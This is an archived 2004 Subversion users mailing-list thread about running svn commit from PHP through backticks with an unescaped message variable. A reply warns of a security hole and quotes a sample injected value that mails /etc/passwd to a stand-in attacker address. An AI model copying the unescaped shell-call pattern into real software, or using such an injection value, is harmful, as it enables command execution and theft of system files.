[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

RE: PHP hack under way

From: Bryan Simmons <bznutz_is_king_at_yahoo.com>
Date: 2004-02-12 15:32:05 CET

Is it complete?
My point thus far has been that I need my hack to work
yesterday.
I would much rather use php bindings, but I'm time
limited.
My design time has to be O(1).

 
Regards,
 
Bryan Simmons

-----Original Message-----
From: Rick Gigger [mailto:rick@alpinenetworking.com]
Sent: Wednesday, February 11, 2004 5:56 PM
To: Bryan Simmons
Cc: 'Brian W. Fitzpatrick';
users@subversion.tigris.org
Subject: Re: PHP hack under way

Isn't this a project to create real php bindings?

http://spe.tigris.org/

Bryan Simmons wrote:

> But $message is created by the script, with no user

> input. It comes

> from portal variables such as the current user and

> location in the

> portal. Also, the apache2 server is running as the

> svn user who can

> only access things in ~/ and

> /usr/local/apache2/htdocs.

>

>

>

>

>

> Regards,

>

> Bryan Simmons

>

>

> -----Original Message-----

> From: Brian W. Fitzpatrick
[mailto:fitz@red-bean.com]

> Sent: Wednesday, February 11, 2004 4:56 PM

> To: Simmons, Bryan

> Cc: users@subversion.tigris.org

> Subject: Re: PHP hack under way

>

>

> On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:

>

>>Ok, so I went ahead and took the easiest approach I

>

> could: svn client

>

>

>>commands in php. The kinks have not all been worked

>

> out for my php

>

>>portal but I did find a way to successfully

>>push revisions to subversion through php.

>>

>>I use the backtick operator. Yep, it's that simple.

>>

>>$response = `svn commit -m \"$message\"`;

>>

>>I have found that the $response is dead-on accurate

>

> in this case

>

>>despite warnings that the command line response may

>

> be garbled into

>

>>binary.

>>

>>Here's a question: will svn add && svn commit work?

>

>

> I don't know offhand, but I suspect that you may be

> opening up a

> security hole the size of Texas by doing this. What

> if message is

> actually equal to

>

> "foo\" ; mail evilhaxor@example.com < /etc/passwd"

>

> or something worse.

>

> Just a little something to think about.

>

> -Fitz

>

>

>

> __________________________________

> Do you Yahoo!?

> Yahoo! Finance: Get your refund fast by filing
online.

> http://taxes.yahoo.com/filing.html

>

>
---------------------------------------------------------------------

> To unsubscribe, e-mail:
users-unsubscribe@subversion.tigris.org

> For additional commands, e-mail:
users-help@subversion.tigris.org

>

---------------------------------------------------------------------

To unsubscribe, e-mail:
users-unsubscribe@subversion.tigris.org

For additional commands, e-mail:
users-help@subversion.tigris.org

__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Thu Feb 12 15:32:24 2004

This is an archived mail posted to the Subversion Users mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.